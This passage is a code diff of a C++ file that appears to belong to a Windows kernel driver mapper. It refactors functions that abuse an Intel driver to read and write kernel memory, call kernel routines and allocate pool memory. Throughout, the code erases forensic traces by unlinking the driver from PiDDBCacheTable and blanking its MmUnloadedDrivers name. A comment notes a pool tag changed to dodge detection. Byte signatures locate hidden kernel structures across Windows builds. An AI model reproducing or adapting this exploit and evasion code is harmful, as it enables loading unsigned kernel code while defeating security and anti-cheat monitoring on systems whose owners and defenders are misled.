+		kernel_MmAllocateIndependentPagesEx = (uint64_t)ResolveRelativeAddress((PVOID)kernel_MmAllocateIndependentPagesEx, 1, 5);
 		if (!kernel_MmAllocateIndependentPagesEx) {
 			Log(L"[!] Failed to find MmAllocateIndependentPagesEx" << std::endl);
 			return 0;
@@ -556,13 +557,13 @@ uint64_t intel_driver::MmAllocateIndependentPagesEx(HANDLE device_handle, uint32
 	}
 #endif
 
-	if (!intel_driver::CallKernelFunction(device_handle, &allocated_pages, kernel_MmAllocateIndependentPagesEx, size, -1, 0, 0))
+	if (!intel_driver::CallKernelFunction(&allocated_pages, kernel_MmAllocateIndependentPagesEx, size, -1, 0, 0))
 		return 0;
 
 	return allocated_pages;
 }
 
-bool intel_driver::MmFreeIndependentPages(HANDLE device_handle, uint64_t address, uint32_t size)
+bool intel_driver::MmFreeIndependentPages(uint64_t address, uint32_t size)
 {
 	static uint64_t kernel_MmFreeIndependentPages = 0;
 
@@ -576,7 +577,7 @@ bool intel_driver::MmFreeIndependentPages(HANDLE device_handle, uint64_t address
 		}
 		kernel_MmFreeIndependentPages += intel_driver::ntoskrnlAddr;
 #else
-		kernel_MmFreeIndependentPages = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr,
+		kernel_MmFreeIndependentPages = intel_driver::FindPatternInSectionAtKernel("PAGE", intel_driver::ntoskrnlAddr,
 			(BYTE*)"\xBA\x00\x60\x00\x00\x48\x8B\xCB\xE8\x00\x00\x00\x00\x48\x8D\x8B\x00\xF0\xFF\xFF",
 			(char*)"xxxxxxxxx????xxxxxxx");
 		if (!kernel_MmFreeIndependentPages) {
@@ -586,7 +587,7 @@ bool intel_driver::MmFreeIndependentPages(HANDLE device_handle, uint64_t address
 
 		kernel_MmFreeIndependentPages += 8;
 
-		kernel_MmFreeIndependentPages = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmFreeIndependentPages, 1, 5);
+		kernel_MmFreeIndependentPages = (uint64_t)ResolveRelativeAddress((PVOID)kernel_MmFreeIndependentPages, 1, 5);
 		if (!kernel_MmFreeIndependentPages) {
 			Log(L"[!] Failed to find MmFreeIndependentPages" << std::endl);
 			return false;
@@ -595,10 +596,10 @@ bool intel_driver::MmFreeIndependentPages(HANDLE device_handle, uint64_t address
 	}
 
 	uint64_t result{};
-	return intel_driver::CallKernelFunction(device_handle, &result, kernel_MmFreeIndependentPages, address, size);
+	return intel_driver::CallKernelFunction(&result, kernel_MmFreeIndependentPages, address, size);
 }
 
-BOOLEAN intel_driver::MmSetPageProtection(HANDLE device_handle, uint64_t address, uint32_t size, ULONG new_protect)
+BOOLEAN intel_driver::MmSetPageProtection(uint64_t address, uint32_t size, ULONG new_protect)
 {
 	if (!address)
 	{
@@ -621,12 +622,12 @@ BOOLEAN intel_driver::MmSetPageProtection(HANDLE device_handle, uint64_t address
 		//Updated, tested from 1803 to 24H2
 		//  0F 45 ? ? 8D ? ? ? FF FF E8
 		//  0F 45 ? ? 45 8B ? ? ? ? 8D ? ? ? ? ? ? FF FF E8  (Some windows builds have a instruction in the middle)
-		kernel_MmSetPageProtection = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGELK", intel_driver::ntoskrnlAddr, 
+		kernel_MmSetPageProtection = intel_driver::FindPatternInSectionAtKernel("PAGELK", intel_driver::ntoskrnlAddr, 
 			(BYTE*)"\x0F\x45\x00\x00\x8D\x00\x00\x00\xFF\xFF\xE8",
 			(char*)"xx??x???xxx");
 		if (!kernel_MmSetPageProtection) {
 
-			kernel_MmSetPageProtection = intel_driver::FindPatternInSectionAtKernel(device_handle, "PAGELK", intel_driver::ntoskrnlAddr,
+			kernel_MmSetPageProtection = intel_driver::FindPatternInSectionAtKernel("PAGELK", intel_driver::ntoskrnlAddr,
 				(BYTE*)"\x0F\x45\x00\x00\x45\x8B\x00\x00\x00\x00\x8D\x00\x00\x00\x00\x00\x00\xFF\xFF\xE8",
 				(char*)"xx??xx????x???xxx");
 
@@ -641,7 +642,7 @@ BOOLEAN intel_driver::MmSetPageProtection(HANDLE device_handle, uint64_t address
 			kernel_MmSetPageProtection += 10;
 		}
 
-		kernel_MmSetPageProtection = (uint64_t)ResolveRelativeAddress(device_handle, (PVOID)kernel_MmSetPageProtection, 1, 5);
+		kernel_MmSetPageProtection = (uint64_t)ResolveRelativeAddress((PVOID)kernel_MmSetPageProtection, 1, 5);
 		if (!kernel_MmSetPageProtection) {
 			Log(L"[!] Failed to find MmSetPageProtection" << std::endl);
 			return FALSE;
@@ -650,17 +651,17 @@ BOOLEAN intel_driver::MmSetPageProtection(HANDLE device_handle, uint64_t address
 	}
 
 	BOOLEAN set_prot_status{};
-	if (!intel_driver::CallKernelFunction(device_handle, &set_prot_status, kernel_MmSetPageProtection, address, size, new_protect))
+	if (!intel_driver::CallKernelFunction(&set_prot_status, kernel_MmSetPageProtection, address, size, new_protect))
 		return FALSE;
 
 	return set_prot_status;
 }
 
-uint64_t intel_driver::AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_type, uint64_t size) {
+uint64_t intel_driver::AllocatePool(nt::POOL_TYPE pool_type, uint64_t size) {
 	if (!size)
 		return 0;
 
-	static uint64_t kernel_ExAllocatePool = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExAllocatePoolWithTag");
+	static uint64_t kernel_ExAllocatePool = GetKernelModuleExport(intel_driver::ntoskrnlAddr, "ExAllocatePoolWithTag");
 
 	if (!kernel_ExAllocatePool) {
 		Log(L"[!] Failed to find ExAllocatePool" << std::endl);
@@ -669,35 +670,35 @@ uint64_t intel_driver::AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_typ
 
 	uint64_t allocated_pool = 0;
 
-	if (!CallKernelFunction(device_handle, &allocated_pool, kernel_ExAllocatePool, pool_type, size, 'BwtE')) //Changed pool tag since an extremely meme checking diff between allocation size and average for detection....
+	if (!CallKernelFunction(&allocated_pool, kernel_ExAllocatePool, pool_type, size, 'BwtE')) //Changed pool tag since an extremely meme checking diff between allocation size and average for detection....
 		return 0;
 
 	return allocated_pool;
 }
 
-bool intel_driver::FreePool(HANDLE device_handle, uint64_t address) {
+bool intel_driver::FreePool(uint64_t address) {
 	if (!address)
 		return 0;
 
-	static uint64_t kernel_ExFreePool = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExFreePool");
+	static uint64_t kernel_ExFreePool = GetKernelModuleExport(intel_driver::ntoskrnlAddr, "ExFreePool");
 
 	if (!kernel_ExFreePool) {
 		Log(L"[!] Failed to find ExAllocatePool" << std::endl);
 		return 0;
 	}
 
-	return CallKernelFunction<void>(device_handle, nullptr, kernel_ExFreePool, address);
+	return CallKernelFunction<void>(nullptr, kernel_ExFreePool, address);
 }
 
-uint64_t intel_driver::GetKernelModuleExport(HANDLE device_handle, uint64_t kernel_module_base, const std::string& function_name) {
+uint64_t intel_driver::GetKernelModuleExport(uint64_t kernel_module_base, const std::string& function_name) {
 	if (!kernel_module_base)
 		return 0;
 
 	IMAGE_DOS_HEADER dos_header = { 0 };
 	IMAGE_NT_HEADERS64 nt_headers = { 0 };
 
-	if (!ReadMemory(device_handle, kernel_module_base, &dos_header, sizeof(dos_header)) || dos_header.e_magic != IMAGE_DOS_SIGNATURE ||
-		!ReadMemory(device_handle, kernel_module_base + dos_header.e_lfanew, &nt_headers, sizeof(nt_headers)) || nt_headers.Signature != IMAGE_NT_SIGNATURE)
+	if (!ReadMemory(kernel_module_base, &dos_header, sizeof(dos_header)) || dos_header.e_magic != IMAGE_DOS_SIGNATURE ||
+		!ReadMemory(kernel_module_base + dos_header.e_lfanew, &nt_headers, sizeof(nt_headers)) || nt_headers.Signature != IMAGE_NT_SIGNATURE)
 		return 0;
 
 	const auto export_base = nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
@@ -708,7 +709,7 @@ uint64_t intel_driver::GetKernelModuleExport(HANDLE device_handle, uint64_t kern
 
 	const auto export_data = reinterpret_cast<PIMAGE_EXPORT_DIRECTORY>(VirtualAlloc(nullptr, export_base_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
 
-	if (!ReadMemory(device_handle, kernel_module_base + export_base, export_data, export_base_size))
+	if (!ReadMemory(kernel_module_base + export_base, export_data, export_base_size))
 	{
 		VirtualFree(export_data, 0, MEM_RELEASE);
 		return 0;
@@ -745,7 +746,7 @@ uint64_t intel_driver::GetKernelModuleExport(HANDLE device_handle, uint64_t kern
 	return 0;
 }
 
-bool intel_driver::ClearMmUnloadedDrivers(HANDLE device_handle) {
+bool intel_driver::ClearMmUnloadedDrivers() {
 	ULONG buffer_size = 0;
 	void* buffer = nullptr;
 
@@ -777,7 +778,7 @@ bool intel_driver::ClearMmUnloadedDrivers(HANDLE device_handle) {
 		if (current_system_handle.UniqueProcessId != reinterpret_cast<HANDLE>(static_cast<uint64_t>(GetCurrentProcessId())))
 			continue;
 
-		if (current_system_handle.HandleValue == device_handle)
+		if (current_system_handle.HandleValue == hDevice)
 		{
 			object = reinterpret_cast<uint64_t>(current_system_handle.Object);
 			break;
@@ -791,41 +792,41 @@ bool intel_driver::ClearMmUnloadedDrivers(HANDLE device_handle) {
 
 	uint64_t device_object = 0;
 
-	if (!ReadMemory(device_handle, object + 0x8, &device_object, sizeof(device_object)) || !device_object) {
+	if (!ReadMemory(object + 0x8, &device_object, sizeof(device_object)) || !device_object) {
 		Log(L"[!] Failed to find device_object" << std::endl);
 		return false;
 	}
 
 	uint64_t driver_object = 0;
 
-	if (!ReadMemory(device_handle, device_object + 0x8, &driver_object, sizeof(driver_object)) || !driver_object) {
+	if (!ReadMemory(device_object + 0x8, &driver_object, sizeof(driver_object)) || !driver_object) {
 		Log(L"[!] Failed to find driver_object" << std::endl);
 		return false;
 	}
 
 	uint64_t driver_section = 0;
 
-	if (!ReadMemory(device_handle, driver_object + 0x28, &driver_section, sizeof(driver_section)) || !driver_section) {
+	if (!ReadMemory(driver_object + 0x28, &driver_section, sizeof(driver_section)) || !driver_section) {
 		Log(L"[!] Failed to find driver_section" << std::endl);
 		return false;
 	}
 
 	UNICODE_STRING us_driver_base_dll_name = { 0 };
 
-	if (!ReadMemory(device_handle, driver_section + 0x58, &us_driver_base_dll_name, sizeof(us_driver_base_dll_name)) || us_driver_base_dll_name.Length == 0) {
+	if (!ReadMemory(driver_section + 0x58, &us_driver_base_dll_name, sizeof(us_driver_base_dll_name)) || us_driver_base_dll_name.Length == 0) {
 		Log(L"[!] Failed to find driver name" << std::endl);
 		return false;
 	}
 
 	auto unloadedName = std::make_unique<wchar_t[]>((ULONG64)us_driver_base_dll_name.Length / 2ULL + 1ULL);
-	if (!ReadMemory(device_handle, (uintptr_t)us_driver_base_dll_name.Buffer, unloadedName.get(), us_driver_base_dll_name.Length)) {
+	if (!ReadMemory((uintptr_t)us_driver_base_dll_name.Buffer, unloadedName.get(), us_driver_base_dll_name.Length)) {
 		Log(L"[!] Failed to read driver name" << std::endl);
 		return false;
 	}
 
 	us_driver_base_dll_name.Length = 0; //MiRememberUnloadedDriver will check if the length > 0 to save the unloaded driver
 
-	if (!WriteMemory(device_handle, driver_section + 0x58, &us_driver_base_dll_name, sizeof(us_driver_base_dll_name))) {
+	if (!WriteMemory(driver_section + 0x58, &us_driver_base_dll_name, sizeof(us_driver_base_dll_name))) {
 		Log(L"[!] Failed to write driver name length" << std::endl);
 		return false;
 	}
@@ -834,21 +835,21 @@ bool intel_driver::ClearMmUnloadedDrivers(HANDLE device_handle) {
 	return true;
 }
 
-PVOID intel_driver::ResolveRelativeAddress(HANDLE device_handle, _In_ PVOID Instruction, _In_ ULONG OffsetOffset, _In_ ULONG InstructionSize) {
+PVOID intel_driver::ResolveRelativeAddress(_In_ PVOID Instruction, _In_ ULONG OffsetOffset, _In_ ULONG InstructionSize) {
 	ULONG_PTR Instr = (ULONG_PTR)Instruction;
 	LONG RipOffset = 0;
-	if (!ReadMemory(device_handle, Instr + OffsetOffset, &RipOffset, sizeof(LONG))) {
+	if (!ReadMemory(Instr + OffsetOffset, &RipOffset, sizeof(LONG))) {
 		return nullptr;
 	}
 	PVOID ResolvedAddr = (PVOID)(Instr + InstructionSize + RipOffset);
 	return ResolvedAddr;
 }
 
-bool intel_driver::ExAcquireResourceExclusiveLite(HANDLE device_handle, PVOID Resource, BOOLEAN wait) {
+bool intel_driver::ExAcquireResourceExclusiveLite(PVOID Resource, BOOLEAN wait) {
 	if (!Resource)
 		return 0;
 
-	static uint64_t kernel_ExAcquireResourceExclusiveLite = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExAcquireResourceExclusiveLite");
+	static uint64_t kernel_ExAcquireResourceExclusiveLite = GetKernelModuleExport(intel_driver::ntoskrnlAddr, "ExAcquireResourceExclusiveLite");
 
 	if (!kernel_ExAcquireResourceExclusiveLite) {
 		Log(L"[!] Failed to find ExAcquireResourceExclusiveLite" << std::endl);
@@ -857,28 +858,28 @@ bool intel_driver::ExAcquireResourceExclusiveLite(HANDLE device_handle, PVOID Re
 
 	BOOLEAN out;
 
-	return (CallKernelFunction(device_handle, &out, kernel_ExAcquireResourceExclusiveLite, Resource, wait) && out);
+	return (CallKernelFunction(&out, kernel_ExAcquireResourceExclusiveLite, Resource, wait) && out);
 }
 
-bool intel_driver::ExReleaseResourceLite(HANDLE device_handle, PVOID Resource) {
+bool intel_driver::ExReleaseResourceLite(PVOID Resource) {
 	if (!Resource)
 		return false;
 
-	static uint64_t kernel_ExReleaseResourceLite = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExReleaseResourceLite");
+	static uint64_t kernel_ExReleaseResourceLite = GetKernelModuleExport(intel_driver::ntoskrnlAddr, "ExReleaseResourceLite");
 
 	if (!kernel_ExReleaseResourceLite) {
 		Log(L"[!] Failed to find ExReleaseResourceLite" << std::endl);
 		return false;
 	}
 
-	return CallKernelFunction<void>(device_handle, nullptr, kernel_ExReleaseResourceLite, Resource);
+	return CallKernelFunction<void>(nullptr, kernel_ExReleaseResourceLite, Resource);
 }
 
-BOOLEAN intel_driver::RtlDeleteElementGenericTableAvl(HANDLE device_handle, PVOID Table, PVOID Buffer) {
+BOOLEAN intel_driver::RtlDeleteElementGenericTableAvl(PVOID Table, PVOID Buffer) {
 	if (!Table)
 		return false;
 
-	static uint64_t kernel_RtlDeleteElementGenericTableAvl = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "RtlDeleteElementGenericTableAvl");
+	static uint64_t kernel_RtlDeleteElementGenericTableAvl = GetKernelModuleExport(intel_driver::ntoskrnlAddr, "RtlDeleteElementGenericTableAvl");
 
 	if (!kernel_RtlDeleteElementGenericTableAvl) {
 		Log(L"[!] Failed to find RtlDeleteElementGenericTableAvl" << std::endl);
@@ -886,14 +887,14 @@ BOOLEAN intel_driver::RtlDeleteElementGenericTableAvl(HANDLE device_handle, PVOI
 	}
 
 	bool out;
-	return (CallKernelFunction(device_handle, &out, kernel_RtlDeleteElementGenericTableAvl, Table, Buffer) && out);
+	return (CallKernelFunction(&out, kernel_RtlDeleteElementGenericTableAvl, Table, Buffer) && out);
 }
 
-PVOID intel_driver::RtlLookupElementGenericTableAvl(HANDLE device_handle, nt::PRTL_AVL_TABLE Table, PVOID Buffer) {
+PVOID intel_driver::RtlLookupElementGenericTableAvl(nt::PRTL_AVL_TABLE Table, PVOID Buffer) {
 	if (!Table)
 		return nullptr;
 
-	static uint64_t kernel_RtlDeleteElementGenericTableAvl = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "RtlLookupElementGenericTableAvl");
+	static uint64_t kernel_RtlDeleteElementGenericTableAvl = GetKernelModuleExport(intel_driver::ntoskrnlAddr, "RtlLookupElementGenericTableAvl");
 
 	if (!kernel_RtlDeleteElementGenericTableAvl) {
 		Log(L"[!] Failed to find RtlLookupElementGenericTableAvl" << std::endl);
@@ -902,14 +903,14 @@ PVOID intel_driver::RtlLookupElementGenericTableAvl(HANDLE device_handle, nt::PR
 
 	PVOID out;
 
-	if (!CallKernelFunction(device_handle, &out, kernel_RtlDeleteElementGenericTableAvl, Table, Buffer))
+	if (!CallKernelFunction(&out, kernel_RtlDeleteElementGenericTableAvl, Table, Buffer))
 		return 0;
 
 	return out;
 }
 
 
-nt::PiDDBCacheEntry* intel_driver::LookupEntry(HANDLE device_handle, nt::PRTL_AVL_TABLE PiDDBCacheTable, ULONG timestamp, const wchar_t * name) {
+nt::PiDDBCacheEntry* intel_driver::LookupEntry(nt::PRTL_AVL_TABLE PiDDBCacheTable, ULONG timestamp, const wchar_t * name) {
 	
 	nt::PiDDBCacheEntry localentry{};
 	localentry.TimeDateStamp = timestamp;
@@ -917,10 +918,10 @@ nt::PiDDBCacheEntry* intel_driver::LookupEntry(HANDLE device_handle, nt::PRTL_AV
 	localentry.DriverName.Length = (USHORT)(wcslen(name) * 2);
 	localentry.DriverName.MaximumLength = localentry.DriverName.Length + 2;
 
-	return (nt::PiDDBCacheEntry*)RtlLookupElementGenericTableAvl(device_handle, PiDDBCacheTable, (PVOID)&localentry);
+	return (nt::PiDDBCacheEntry*)RtlLookupElementGenericTableAvl(PiDDBCacheTable, (PVOID)&localentry);
 }
 
-bool intel_driver::ClearPiDDBCacheTable(HANDLE device_handle) { //PiDDBCacheTable added on LoadDriver
+bool intel_driver::ClearPiDDBCacheTable() { //PiDDBCacheTable added on LoadDriver
 
 #ifdef PDB_OFFSETS
 	auto PiDDBLockOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"PiDDBLock");
@@ -940,13 +941,13 @@ bool intel_driver::ClearPiDDBCacheTable(HANDLE device_handle) { //PiDDBCacheTabl
 	PVOID PiDDBLock = (PVOID)(intel_driver::ntoskrnlAddr + PiDDBLockOffset);
 	nt::PRTL_AVL_TABLE PiDDBCacheTable = (nt::PRTL_AVL_TABLE)(intel_driver::ntoskrnlAddr + PiDDBCacheTableOffset);
 #else
-	auto PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x8B\xD8\x85\xC0\x0F\x88\x00\x00\x00\x00\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x66\xFF\x88\x00\x00\x00\x00\xB2\x01\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\x4C\x8B\x00\x24", "xxxxxx????xxxxx????xxx????xxxxx????x????xx?x"); // 8B D8 85 C0 0F 88 ? ? ? ? 65 48 8B 04 25 ? ? ? ? 66 FF 88 ? ? ? ? B2 01 48 8D 0D ? ? ? ? E8 ? ? ? ? 4C 8B ? 24 update for build 22000.132
-	auto PiDDBCacheTablePtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x66\x03\xD2\x48\x8D\x0D", "xxxxxx"); // 66 03 D2 48 8D 0D
+	auto PiDDBLockPtr = FindPatternInSectionAtKernel("PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x8B\xD8\x85\xC0\x0F\x88\x00\x00\x00\x00\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x66\xFF\x88\x00\x00\x00\x00\xB2\x01\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\x4C\x8B\x00\x24", "xxxxxx????xxxxx????xxx????xxxxx????x????xx?x"); // 8B D8 85 C0 0F 88 ? ? ? ? 65 48 8B 04 25 ? ? ? ? 66 FF 88 ? ? ? ? B2 01 48 8D 0D ? ? ? ? E8 ? ? ? ? 4C 8B ? 24 update for build 22000.132
+	auto PiDDBCacheTablePtr = FindPatternInSectionAtKernel("PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x66\x03\xD2\x48\x8D\x0D", "xxxxxx"); // 66 03 D2 48 8D 0D
 
 	if (PiDDBLockPtr == NULL) { // PiDDBLock pattern changes a lot from version 1607 of windows and we will need a second pattern if we want to keep simple as possible
-		PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x48\x8B\x0D\x00\x00\x00\x00\x48\x85\xC9\x0F\x85\x00\x00\x00\x00\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\xE8", "xxx????xxxxx????xxx????x????x"); // 48 8B 0D ? ? ? ? 48 85 C9 0F 85 ? ? ? ? 48 8D 0D ? ? ? ? E8 ? ? ? ? E8 build 22449+ (pattern can be improved but just fine for now)
+		PiDDBLockPtr = FindPatternInSectionAtKernel("PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x48\x8B\x0D\x00\x00\x00\x00\x48\x85\xC9\x0F\x85\x00\x00\x00\x00\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\xE8", "xxx????xxxxx????xxx????x????x"); // 48 8B 0D ? ? ? ? 48 85 C9 0F 85 ? ? ? ? 48 8D 0D ? ? ? ? E8 ? ? ? ? E8 build 22449+ (pattern can be improved but just fine for now)
 		if (PiDDBLockPtr == NULL) {
-			PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x8B\xD8\x85\xC0\x0F\x88\x00\x00\x00\x00\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x48\x8D\x0D\x00\x00\x00\x00\xB2\x01\x66\xFF\x88\x00\x00\x00\x00\x90\xE8\x00\x00\x00\x00\x4C\x8B\x00\x24", "xxxxxx????xxxxx????xxx????xxxxx????xx????xx?x"); // 8B D8 85 C0 0F 88 ? ? ? ? 65 48 8B 04 25 ? ? ? ? 48 8D 0D ? ? ? ? B2 01 66 FF 88 ? ? ? ? 90 E8 ? ? ? ? 4C 8B ? 24 update for build 26100.1000
+			PiDDBLockPtr = FindPatternInSectionAtKernel("PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x8B\xD8\x85\xC0\x0F\x88\x00\x00\x00\x00\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x48\x8D\x0D\x00\x00\x00\x00\xB2\x01\x66\xFF\x88\x00\x00\x00\x00\x90\xE8\x00\x00\x00\x00\x4C\x8B\x00\x24", "xxxxxx????xxxxx????xxx????xxxxx????xx????xx?x"); // 8B D8 85 C0 0F 88 ? ? ? ? 65 48 8B 04 25 ? ? ? ? 48 8D 0D ? ? ? ? B2 01 66 FF 88 ? ? ? ? 90 E8 ? ? ? ? 4C 8B ? 24 update for build 26100.1000
 			if (PiDDBLockPtr == NULL) {
 				Log(L"[-] Warning PiDDBLock not found" << std::endl);
 				return false;
@@ -966,7 +967,7 @@ bool intel_driver::ClearPiDDBCacheTable(HANDLE device_handle) { //PiDDBCacheTabl
 	}
 
 	if (PiDDBCacheTablePtr == NULL) {
-		PiDDBCacheTablePtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x48\x8B\xF9\x33\xC0\x48\x8D\x0D", "xxxxxxxx"); // 48 8B F9 33 C0 48 8D 0D
+		PiDDBCacheTablePtr = FindPatternInSectionAtKernel("PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x48\x8B\xF9\x33\xC0\x48\x8D\x0D", "xxxxxxxx"); // 48 8B F9 33 C0 48 8D 0D
 		if (PiDDBCacheTablePtr == NULL) {
 			Log(L"[-] Warning PiDDBCacheTable not found" << std::endl);
 			return false;
@@ -980,12 +981,12 @@ bool intel_driver::ClearPiDDBCacheTable(HANDLE device_handle) { //PiDDBCacheTabl
 	Log("[+] PiDDBLock Ptr 0x" << std::hex << PiDDBLockPtr << std::endl);
 	Log("[+] PiDDBCacheTable Ptr 0x" << std::hex << PiDDBCacheTablePtr << std::endl);
 
-	PVOID PiDDBLock = ResolveRelativeAddress(device_handle, (PVOID)PiDDBLockPtr, 3, 7);
-	nt::PRTL_AVL_TABLE PiDDBCacheTable = (nt::PRTL_AVL_TABLE)ResolveRelativeAddress(device_handle, (PVOID)PiDDBCacheTablePtr, 6, 10);
+	PVOID PiDDBLock = ResolveRelativeAddress((PVOID)PiDDBLockPtr, 3, 7);
+	nt::PRTL_AVL_TABLE PiDDBCacheTable = (nt::PRTL_AVL_TABLE)ResolveRelativeAddress((PVOID)PiDDBCacheTablePtr, 6, 10);
 #endif
 	//context part is not used by lookup, lock or delete why we should use it?
 
-	if (!ExAcquireResourceExclusiveLite(device_handle, PiDDBLock, true)) {
+	if (!ExAcquireResourceExclusiveLite(PiDDBLock, true)) {
 		Log(L"[-] Can't lock PiDDBCacheTable" << std::endl);
 		return false;
 	}
@@ -996,64 +997,64 @@ bool intel_driver::ClearPiDDBCacheTable(HANDLE device_handle) { //PiDDBCacheTabl
 	auto timestamp = portable_executable::GetNtHeaders((void*)intel_driver_resource::driver)->FileHeader.TimeDateStamp;
 
 	// search our entry in the table
-	nt::PiDDBCacheEntry* pFoundEntry = (nt::PiDDBCacheEntry*)LookupEntry(device_handle, PiDDBCacheTable, timestamp, n.c_str());
+	nt::PiDDBCacheEntry* pFoundEntry = (nt::PiDDBCacheEntry*)LookupEntry(PiDDBCacheTable, timestamp, n.c_str());
 	if (pFoundEntry == nullptr) {
 		Log(L"[-] Not found in cache" << std::endl);
-		ExReleaseResourceLite(device_handle, PiDDBLock);
+		ExReleaseResourceLite(PiDDBLock);
 		return false;
 	}
 
 	// first, unlink from the list
 	PLIST_ENTRY prev;
-	if (!ReadMemory(device_handle, (uintptr_t)pFoundEntry + (offsetof(struct nt::_PiDDBCacheEntry, List.Blink)), &prev, sizeof(_LIST_ENTRY*))) {
+	if (!ReadMemory((uintptr_t)pFoundEntry + (offsetof(struct nt::_PiDDBCacheEntry, List.Blink)), &prev, sizeof(_LIST_ENTRY*))) {
 		Log(L"[-] Can't get prev entry" << std::endl);
-		ExReleaseResourceLite(device_handle, PiDDBLock);
+		ExReleaseResourceLite(PiDDBLock);
 		return false;
 	}
 	PLIST_ENTRY next;
-	if (!ReadMemory(device_handle, (uintptr_t)pFoundEntry + (offsetof(struct nt::_PiDDBCacheEntry, List.Flink)), &next, sizeof(_LIST_ENTRY*))) {
+	if (!ReadMemory((uintptr_t)pFoundEntry + (offsetof(struct nt::_PiDDBCacheEntry, List.Flink)), &next, sizeof(_LIST_ENTRY*))) {
 		Log(L"[-] Can't get next entry" << std::endl);
-		ExReleaseResourceLite(device_handle, PiDDBLock);
+		ExReleaseResourceLite(PiDDBLock);
 		return false;
 	}
 
 	Log("[+] Found Table Entry = 0x" << std::hex << pFoundEntry << std::endl);
 
-	if (!WriteMemory(device_handle, (uintptr_t)prev + (offsetof(struct _LIST_ENTRY, Flink)), &next, sizeof(_LIST_ENTRY*))) {
+	if (!WriteMemory((uintptr_t)prev + (offsetof(struct _LIST_ENTRY, Flink)), &next, sizeof(_LIST_ENTRY*))) {
 		Log(L"[-] Can't set next entry" << std::endl);
-		ExReleaseResourceLite(device_handle, PiDDBLock);
+		ExReleaseResourceLite(PiDDBLock);
 		return false;
 	}
-	if (!WriteMemory(device_handle, (uintptr_t)next + (offsetof(struct _LIST_ENTRY, Blink)), &prev, sizeof(_LIST_ENTRY*))) {
+	if (!WriteMemory((uintptr_t)next + (offsetof(struct _LIST_ENTRY, Blink)), &prev, sizeof(_LIST_ENTRY*))) {
 		Log(L"[-] Can't set prev entry" << std::endl);
-		ExReleaseResourceLite(device_handle, PiDDBLock);
+		ExReleaseResourceLite(PiDDBLock);
 		return false;
 	}
 
 	// then delete the element from the avl table
-	if (!RtlDeleteElementGenericTableAvl(device_handle, PiDDBCacheTable, pFoundEntry)) {
+	if (!RtlDeleteElementGenericTableAvl(PiDDBCacheTable, pFoundEntry)) {
 		Log(L"[-] Can't delete from PiDDBCacheTable" << std::endl);
-		ExReleaseResourceLite(device_handle, PiDDBLock);
+		ExReleaseResourceLite(PiDDBLock);
 		return false;
 	}
 
 	//Decrement delete count
 	ULONG cacheDeleteCount = 0;
-	ReadMemory(device_handle, (uintptr_t)PiDDBCacheTable + (offsetof(struct nt::_RTL_AVL_TABLE, DeleteCount)), &cacheDeleteCount, sizeof(ULONG));
+	ReadMemory((uintptr_t)PiDDBCacheTable + (offsetof(struct nt::_RTL_AVL_TABLE, DeleteCount)), &cacheDeleteCount, sizeof(ULONG));
 	if (cacheDeleteCount > 0) {
 		cacheDeleteCount--;
-		WriteMemory(device_handle, (uintptr_t)PiDDBCacheTable + (offsetof(struct nt::_RTL_AVL_TABLE, DeleteCount)), &cacheDeleteCount, sizeof(ULONG));
+		WriteMemory((uintptr_t)PiDDBCacheTable + (offsetof(struct nt::_RTL_AVL_TABLE, DeleteCount)), &cacheDeleteCount, sizeof(ULONG));
 	}
 
 	// release the ddb resource lock
-	ExReleaseResourceLite(device_handle, PiDDBLock);
+	ExReleaseResourceLite(PiDDBLock);
 
 	Log(L"[+] PiDDBCacheTable Cleaned" << std::endl);
 
 	return true;
 }
 
-uintptr_t intel_driver::FindPatternAtKernel(HANDLE device_handle, uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask) {
+uintptr_t intel_driver::FindPatternAtKernel(uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask) {
 	if (!dwAddress) {
 		Log(L"[-] No module address to find pattern" << std::endl);
 		return 0;
@@ -1065,7 +1066,7 @@ uintptr_t intel_driver::FindPatternAtKernel(HANDLE device_handle, uintptr_t dwAd
 	}
 
 	auto sectionData = std::make_unique<BYTE[]>(dwLen);
-	if (!ReadMemory(device_handle, dwAddress, sectionData.get(), dwLen)) {
+	if (!ReadMemory(dwAddress, sectionData.get(), dwLen)) {
 		Log(L"[-] Read failed in FindPatternAtKernel" << std::endl);
 		return 0;
 	}
